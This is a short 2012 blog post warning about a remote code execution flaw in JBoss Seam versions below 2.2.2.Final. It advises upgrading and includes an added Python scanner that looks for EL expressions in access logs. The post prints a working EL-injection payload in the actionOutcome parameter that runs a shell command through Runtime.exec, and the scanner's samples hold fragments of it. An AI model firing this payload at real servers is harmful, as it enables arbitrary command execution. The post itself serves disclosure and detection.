Monday, September 3, 2012

Never use a JBoss Seam version below 2.2.2.Final

Today's post is a short one about a very significant security hole in JBoss Seam versions below 2.2.2.Final.

It is possible to execute malicious code on your server through a Seam application using only the browser's address bar. To check whether your application is affected, add this to your GET parameters (works on Linux):
actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('mkdir%20/tmp/pwned')}

This code will create a 'pwned' directory in /tmp/.

To close this vulnerability, just update your JBoss Seam to 2.2.2.Final.
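
To see whether anyone has already tried this against your application, you can search the access logs for an actionOutcome parameter carrying an EL expression. The following is an added example, not code from the original post or the linked articles: the access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# "#{" opens a Seam/JSF EL expression; "${" is the other unified-EL opener.
EL_OPEN = re.compile(r"[#$]\{")
# Request target inside a combined-format access-log line (format is an assumption).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2523%257B) is seen too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_action_outcome(log_line):
    """Return the decoded actionOutcome value if it contains an EL opener, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    # Split on the first '?' only: the outcome value may contain a '?' of its own.
    query = match.group(1).partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)
        if name == "actionOutcome" and EL_OPEN.search(value):
            return value
    return None

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Sep/2012:10:00:00 +0000] "GET /app/home.seam?actionOutcome='
    '/pwn.xhtml?pwned%3d%23{expressions.getClass()} HTTP/1.1" 200 512',
    '10.0.0.6 - - [03/Sep/2012:10:00:05 +0000] "GET /app/home.seam?actionOutcome='
    '/home.xhtml?x%253d%2523%257Bfoo.bar%257D HTTP/1.1" 200 512',
    '10.0.0.7 - - [03/Sep/2012:10:00:09 +0000] "GET /app/home.seam?actionOutcome='
    '/home.xhtml HTTP/1.1" 200 512',
    '10.0.0.8 - - [03/Sep/2012:10:00:12 +0000] "GET /app/home.seam HTTP/1.1" 200 512',
]

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            if (hit := suspicious_action_outcome(line))]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(f"line {n}: EL expression in actionOutcome -> {hit}")
```

A hit only shows that a request was made; whether it executed depends on the Seam version that served it.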

In this post I used material from this article. To read more, check these links:
  1. JBoss Seam Framework remote code execution
  2. JBoss Seam2 privilege escalation caused by EL interpolation in FacesMessages
  3. Abusing JBOSS
  4. Good Bye Critical Jboss 0day